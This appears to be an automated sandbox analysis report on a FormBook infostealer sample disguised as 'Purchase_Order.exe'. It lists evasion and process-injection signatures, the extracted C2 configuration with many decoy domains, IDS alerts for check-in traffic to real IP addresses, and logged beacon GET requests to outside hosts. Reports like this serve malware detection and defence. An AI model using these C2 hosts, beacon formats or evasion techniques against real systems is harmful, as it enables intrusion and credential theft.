Analysis Report Purchase_Order.exe

Overview

General Information

Sample Name: Purchase_Order.exe
Analysis ID: 433266
MD5: 4aa8159742becd97f9ecdda33798b065
SHA1: 775aee28c33102de8c4bdd45dd09821b717b8678
SHA256: 65c6621762bb1bb1589a4a58d4ab2d3fa7c02e581b217b86ed2ff51227d7565b
Tags: exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Process Start Without DLL
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.culturalinterface.net/uqf5/"], "decoy": ["paolograssino.com", "hammockcoastproperty.net", "blinbins.com", "financierapoorvenirsas.com", "mattruddle.com", "wighumanhair.com", "tvdajiang14.com", "theblackharvest.com", "tylerrucarean.com", "a-prime-india-demataccount.zone", "amboselisafarigallery.info", "toolbnbapp.com", "scientificindustrial.com", "trainup-wall.com", "pocosmo.com", "thebluepottingtable.com", "leavelogs.com", "verbalfreedom.com", "qa4i.com", "kiiikoo.com", "glossedbythebrat.com", "gorditasdemaiz.com", "healthystartswithin.com", "homeanddesignstudio.com", "skalewide.com", "bestdispatchtowitnesstoday.info", "cineconhisense.com", "mahibhardwaj.com", "imperatrizacam.com", "bezoekburen.com", "qbakan.com", "ansalapishagunrealestate.com", "crow94723.com", "kosova.one", "chhhju.com", "cominghomestead.com", "ingenious.care", "unclesamsoftware.com", "xn--cfe12fhb.com", "tradinglantern.com", "wwwthedrudgereport.com", "researchinnovations.net", "to-cs.com", "sandia.info", "tachibana-fukushima.com", "pzzfw.com", "flockuplabs.com", "stays.travel", "itertempora.net", "murrietayoga.com", "plus5tocrafting.com", "ovidrelprefilledsyringe.com", "prltoday.com", "l24consultants.net", "mexicobeachselfstorage.com", "bnvjufj.icu", "schulze.media", "thewinebarrel.info", "blesst.tech", "newtec.life", "acmarketinghacks.com", "elitevillaholidays.com", "pr-daily.com", "cgjanvier.com"]}
Multi AV Scanner detection for submitted file
Source: Purchase_Order.exe Virustotal: Detection: 20% Perma Link
Source: Purchase_Order.exe ReversingLabs: Detection: 15%
Yara detected FormBook
Source: Yara match File source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: Purchase_Order.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Purchase_Order.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: systray.pdb source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\LQmcYtPAJD\src\obj\Debug\AsAnyMarshaler.pdb source: Purchase_Order.exe
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.321048424.000000000136F000.00000040.00000001.sdmp, systray.exe, 00000010.00000002.505423938.0000000004F40000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, systray.exe
Source: Binary string: RegSvcs.pdb source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop esi 4_2_00415837
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop ebx 4_2_00406A94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop edi 4_2_004162BB
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop esi 16_2_010D5837
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop ebx 16_2_010C6A95
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 16_2_010D62BB

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 162.241.253.69:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 162.241.253.69:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 162.241.253.69:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 156.241.53.127:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 156.241.53.127:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 156.241.53.127:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 45.140.167.161:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 45.140.167.161:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 45.140.167.161:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49755 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49755 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49755 -> 35.246.6.109:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.culturalinterface.net/uqf5/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT HTTP/1.1Host: www.prltoday.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=RIGbPleGLKfxQTAe4w4l83Ie2Cv1rNcMEGxhR3mrD7G7p1l+kx0Gi9Gk7nXoQ0ETWUCd/ihSFA==&x2J86x=b0DT HTTP/1.1Host: www.gorditasdemaiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=Da4K3sj86vB0DiXWDS0M3B9qaJwAtTAx24xw0Tll3v3x/H7Mq6Ed11VjNseOa8Aw4v8GgidMYQ==&x2J86x=b0DT HTTP/1.1Host: www.mexicobeachselfstorage.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=OWFfPnC7AN8R77spBBTPEjKTeS6t/Yq1T4r8C76EKqDZAgRBJ/M7pX2IcLDFGki/UVfODSOMWA==&x2J86x=b0DT HTTP/1.1Host: www.tylerrucarean.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=G6aWL4dGCeTaDQvTN0iTmiC4rQ5Mm02kgONc9W0Ihpzmf26Z6y5bJWrOsZ7s6rQ8mSLn4IOSJg==&x2J86x=b0DT HTTP/1.1Host: www.cgjanvier.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/Aoh82zgIKZtO8rNXLQ==&x2J86x=b0DT HTTP/1.1Host: www.flockuplabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=0mO7J7bxUTMGF+cl/VKrKxzRBdjnePXE0BEJzt+odUfuolHzSnSh7sdQNpsCsCcZdtFb7j3ZKA==&x2J86x=b0DT HTTP/1.1Host: www.culturalinterface.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=pmtBAvifUG/ctnoihxxVo+fAjsCiy+wOZZJ542i91rLFt0/MLgCG4nudrW9V9JXQ/3W4T2ttkA==&x2J86x=b0DT HTTP/1.1Host: www.toolbnbapp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=kfF6JYR62xx/HO09iSVcnhFTUCCMKaRIkXBWym1Qtkj7XLCdUz5OHH2iCIaFDs/mVibljY8vwA==&x2J86x=b0DT HTTP/1.1Host: www.trainup-wall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=bDjqt1XeIDnHqlCDx4UVtMOGyZAgv2iIcL7KLwBfVGeKSjMBDNU7E4Z2+8mD2QoqovVkCTqMJw==&x2J86x=b0DT HTTP/1.1Host: www.paolograssino.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=RQXRa0j10XdpS+WphiMG79Lf9dki4UzLVajXOJjWNMbn24QJDQJAUPqvADWkiraA7rP5UEZeUQ==&x2J86x=b0DT HTTP/1.1Host: www.a-prime-india-demataccount.zoneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 213.186.33.5 213.186.33.5
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT HTTP/1.1Host: www.prltoday.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=RIGbPleGLKfxQTAe4w4l83Ie2Cv1rNcMEGxhR3mrD7G7p1l+kx0Gi9Gk7nXoQ0ETWUCd/ihSFA==&x2J86x=b0DT HTTP/1.1Host: www.gorditasdemaiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=Da4K3sj86vB0DiXWDS0M3B9qaJwAtTAx24xw0Tll3v3x/H7Mq6Ed11VjNseOa8Aw4v8GgidMYQ==&x2J86x=b0DT HTTP/1.1Host: www.mexicobeachselfstorage.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=OWFfPnC7AN8R77spBBTPEjKTeS6t/Yq1T4r8C76EKqDZAgRBJ/M7pX2IcLDFGki/UVfODSOMWA==&x2J86x=b0DT HTTP/1.1Host: www.tylerrucarean.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=G6aWL4dGCeTaDQvTN0iTmiC4rQ5Mm02kgONc9W0Ihpzmf26Z6y5bJWrOsZ7s6rQ8mSLn4IOSJg==&x2J86x=b0DT HTTP/1.1Host: www.cgjanvier.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/Aoh82zgIKZtO8rNXLQ==&x2J86x=b0DT HTTP/1.1Host: www.flockuplabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=0mO7J7bxUTMGF+cl/VKrKxzRBdjnePXE0BEJzt+odUfuolHzSnSh7sdQNpsCsCcZdtFb7j3ZKA==&x2J86x=b0DT HTTP/1.1Host: www.culturalinterface.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=pmtBAvifUG/ctnoihxxVo+fAjsCiy+wOZZJ542i91rLFt0/MLgCG4nudrW9V9JXQ/3W4T2ttkA==&x2J86x=b0DT HTTP/1.1Host: www.toolbnbapp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=kfF6JYR62xx/HO09iSVcnhFTUCCMKaRIkXBWym1Qtkj7XLCdUz5OHH2iCIaFDs/mVibljY8vwA==&x2J86x=b0DT HTTP/1.1Host: www.trainup-wall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=bDjqt1XeIDnHqlCDx4UVtMOGyZAgv2iIcL7KLwBfVGeKSjMBDNU7E4Z2+8mD2QoqovVkCTqMJw==&x2J86x=b0DT HTTP/1.1Host: www.paolograssino.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=RQXRa0j10XdpS+WphiMG79Lf9dki4UzLVajXOJjWNMbn24QJDQJAUPqvADWkiraA7rP5UEZeUQ==&x2J86x=b0DT HTTP/1.1Host: www.a-prime-india-demataccount.zoneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.prltoday.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Jun 2021 13:02:33 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: Purchase_Order.exe, 00000000.00000003.241548215.00000000061F2000.00000004.00000001.sdmp String found in binary or memory: http://en.w
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000007.00000000.291833894.000000000EBF8000.00000004.00000001.sdmp String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000007.00000000.291833894.000000000EBF8000.00000004.00000001.sdmp String found in binary or memory: http://schemas.micr
Source: Purchase_Order.exe, 00000000.00000002.259634056.0000000002AD1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Purchase_Order.exe, 00000000.00000003.245364083.00000000061EE000.00000004.00000001.sdmp String found in binary or memory: http://www.agfamonotype.
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000007.00000000.282669456.0000000006840000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Purchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com
Source: Purchase_Order.exe, 00000000.00000003.242455042.00000000061CD000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.coma
Source: Purchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comen
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Purchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.commd
Source: Purchase_Order.exe, 00000000.00000002.269184385.00000000061CE000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Purchase_Order.exe, 00000000.00000003.245036335.00000000061EE000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Purchase_Order.exe, 00000000.00000003.248726624.00000000061EE000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Purchase_Order.exe String found in binary or memory: http://www.google.com
Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmp, Purchase_Order.exe, 00000000.00000003.243172768.00000000061CA000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/=
Source: Purchase_Order.exe, 00000000.00000003.243172768.00000000061CA000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/N
Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Q
Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/X
Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/b
Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/N
Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Q
Source: Purchase_Order.exe, 00000000.00000003.243047372.00000000061C3000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/oi
Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/u
Source: Purchase_Order.exe, 00000000.00000003.250232182.00000000061ED000.00000004.00000001.sdmp, Purchase_Order.exe, 00000000.00000003.245076408.00000000061EE000.00000004.00000001.sdmp String found in binary or memory: http://www.monotype.
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: Purchase_Order.exe, 00000000.00000003.243758051.00000000061F1000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.com-u
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
